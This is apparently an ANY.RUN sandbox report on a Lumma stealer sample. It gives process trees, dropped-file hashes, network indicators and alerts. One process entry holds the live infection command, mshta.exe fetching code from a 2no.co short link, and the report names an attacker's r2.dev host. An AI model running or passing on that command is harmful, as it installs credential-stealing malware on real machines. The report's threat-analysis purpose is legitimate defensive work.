File name: Presentation.txt

Full analysis: https://app.any.run/tasks/8053495f-9c82-4a66-9cc4-5a4318e3552f
Verdict: Malicious activity
Threats: Lumma

Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.

Analysis date: May 13, 2025, 09:41:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: possible-phishing, susp-powershell, arch-exec, lumma, stealer
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with CRLF line terminators
MD5: 4CD64C573DBED367D1481FCCBF3CB56F
SHA1: 863F9EB609141A6640D1844AE992A140B433C131
SHA256: 25DEEB916D6E6948EC780D9F272CD4A8117D8A503A52F04DCD3F188D5BB2751A
SSDEEP: 48:vhcDZfDSeiO4HED27BqpftP0YumCNd+Rdtm/7OSv4+z:Otf/iO4HEQB+fhSCdkKSv4i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • LUMMA mutex has been found

      • xi.com (PID: 8076)
    • Steals credentials from Web Browsers

      • xi.com (PID: 8076)
    • Actions look like stealing of personal data

      • xi.com (PID: 8076)
  • SUSPICIOUS

    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2196)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 4424)
    • Executes script without checking the security policy

      • powershell.exe (PID: 7348)
    • Executed via WMI

      • powershell.exe (PID: 7348)
    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 4424)
    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7348)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 7348)
      • aaaaa.exe (PID: 7852)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7348)
      • aaaaa.exe (PID: 7852)
    • Starts a Microsoft application from unusual location

      • aaaaa.exe (PID: 7852)
    • Process drops legitimate windows executable

      • aaaaa.exe (PID: 7852)
      • powershell.exe (PID: 7348)
    • Starts application with an unusual extension

      • aaaaa.exe (PID: 7852)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Searches for installed software

      • xi.com (PID: 8076)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 4424)
    • Checks proxy server information

      • mshta.exe (PID: 4424)
      • powershell.exe (PID: 7348)
    • Disables trace logs

      • powershell.exe (PID: 7348)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Reads the computer name

      • aaaaa.exe (PID: 7852)
      • xi.com (PID: 8076)
    • The sample is compiled with English language support

      • powershell.exe (PID: 7348)
      • aaaaa.exe (PID: 7852)
    • Checks supported languages

      • aaaaa.exe (PID: 7852)
      • xi.com (PID: 8076)
    • Creates files in a temporary directory

      • aaaaa.exe (PID: 7852)
    • Reads the software policy settings

      • xi.com (PID: 8076)
    • Creates files in the program directory

      • aaaaa.exe (PID: 7852)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7348)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7348)
No Malware configuration.

TRiD: .bs/bin | PrintFox (C64) bitmap (100)
No data.
All screenshots are available in the full report
Total processes: 133
Monitored processes: 8
Malicious processes: 3
Suspicious processes: 1

Behavior graph

start, mshta.exe, svchost.exe, powershell.exe, conhost.exe (no specs), sppextcomobj.exe (no specs), slui.exe (no specs), aaaaa.exe, #LUMMA xi.com

Process information

PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (Images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 4424
CMD: "C:\Windows\system32\mshta.exe" https://2no.co/2Od3Q3 =+=0056823
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.19041.1 (WinBuild.160101.0800)
Modules (Images):
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
PID: 7348
CMD: powershell.exe -w h -nop -ep un -E [encoded command elided]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (Images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7360
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (Images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7468
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (Images):
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 7500
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (Images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 7852
CMD: "C:\Users\admin\AppData\Local\Temp\aaaaa.exe"
Path: C:\Users\admin\AppData\Local\Temp\aaaaa.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Test Authoring and Execution Framework [v10.66]
Exit code: 0
Version: 10.66.2203.16002
Modules (Images):
c:\users\admin\appdata\local\temp\aaaaa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\users\admin\appdata\local\temp\te.winrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
PID: 8076
CMD: C:\Users\admin\AppData\Local\Temp\15487\xi.com
Path: C:\Users\admin\AppData\Local\Temp\15487\xi.com
Parent process: aaaaa.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Modules (Images):
c:\users\admin\appdata\local\temp\eef667.tmp
c:\users\admin\appdata\local\temp\15487\xi.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
Total events: 7 472
Read events: 7 469
Write events: 3
Delete events: 0

Modification events

(PID) Process: (4424) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value: (empty)

(PID) Process: (4424) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (4424) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:
Executable files: 18
Suspicious files: 14
Text files: 2
Unknown types: 1

Dropped files

PID | Process | Filename (Type)
4424 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 (binary)
  MD5: 904DE65ADA84EE7496820D5625E1ACFD; SHA256: 2087666B27A407AFA0A5D986A952C0B17A2643883C86CFA64E7471F2672AF1D5
4424 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12 (binary)
  MD5: 5155D4762C5C38C97734D5F96FBA8C8D; SHA256: 9BF01E42DA4997E13BB094A8B37AFAA43E0DBCD533114FCBF1FD536294D65AE1
7348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yfnw1h3h.ihu.ps1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641; SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TE.WinRT.dll (executable)
  MD5: CAFA0272724F6559FB7B23AAA69614AE; SHA256: F9C2491EF29C43B7261451A705A6E55ACFBB46AA71D18A310CCD80CE793BC36D
7348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m5ovtd1n.yi1.psm1 (text)
  MD5: D17FE0A3F47BE24A6453E9EF58C94641; SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4424 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 (binary)
  MD5: F2544686B658E388DEB3F39C74F7527D; SHA256: 8D7C79F74E8DF10AAED5F5EF110D35E50786D31C46746EB982AECFF3D2063412
7348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xit.zip (compressed)
  MD5: B6555FA50676836CA3F51CE6A7415095; SHA256: F760C065C108E580185FE20656AFD912BB28F9DDAB9570AF9BF5A01AB8133715
7348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\aaaaa.exe (executable)
  MD5: C92138E57737052DD27E45C8B4A11786; SHA256: B6BBF1BD2C7701667FF4F3DE7AC69FD696C124C88D6FF662322C237F61D48992
4424 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 (binary)
  MD5: E192462F281446B5D1500D474FBACC4B; SHA256: F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
7348 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TE.Common.dll (executable)
  MD5: 3DCA9F4F221F461D8C075992C24F6AEA; SHA256: CEC68BA5EBB3DF9DB3E5FADFD488C1F5D3BFF755C33066A79EEC255B83968EA8
HTTP(S) requests: 9
TCP/UDP connections: 33
DNS requests: 21
Threats: 4

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
4424 | mshta.exe | GET | 200 | 216.58.206.35:80 | http://c.pki.goog/r/gsr1.crl | unknown | whitelisted
 | | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
4424 | mshta.exe | GET | 200 | 216.58.206.35:80 | http://c.pki.goog/r/r4.crl | unknown | whitelisted
4424 | mshta.exe | GET | 200 | 69.192.161.44:80 | http://x1.c.lencr.org/ | unknown | whitelisted
8104 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
8104 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.41:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
 | | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
5496 | MoUsoCoreWorker.exe | 23.216.77.41:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
2104 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5496 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
 | | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4424 | mshta.exe | 172.67.149.76:443 | 2no.co | CLOUDFLARENET | US | whitelisted
4424 | mshta.exe | 216.58.206.35:80 | c.pki.goog | GOOGLE | US | whitelisted
4424 | mshta.exe | 162.159.140.237:443 | pub-164d8d82c41c4e1b871bc21802a18154.r2.dev | CLOUDFLARENET | | suspicious
4424 | mshta.exe | 69.192.161.44:80 | x1.c.lencr.org | AKAMAI-AS | DE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158, 4.231.128.59, 20.73.194.208, 51.124.78.146 | whitelisted
google.com | 216.58.206.78 | whitelisted
crl.microsoft.com | 23.216.77.41, 23.216.77.28, 23.216.77.30, 23.216.77.22 | whitelisted
www.microsoft.com | 23.35.229.160 | whitelisted
2no.co | 172.67.149.76, 104.21.79.229 | whitelisted
c.pki.goog | 216.58.206.35 | whitelisted
pub-164d8d82c41c4e1b871bc21802a18154.r2.dev | 162.159.140.237, 172.66.0.235 | unknown
x1.c.lencr.org | 69.192.161.44 | whitelisted
client.wns.windows.com | 172.211.123.250 | whitelisted
login.live.com | 20.190.160.14, 20.190.160.64, 20.190.160.17, 40.126.32.74, 20.190.160.132, 40.126.32.133, 40.126.32.68, 20.190.160.66 | whitelisted

Threats

PID | Process | Class | Message
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196 | svchost.exe | Possible Social Engineering Attempted | SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196 | svchost.exe | Possible Social Engineering Attempted | SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
No debug info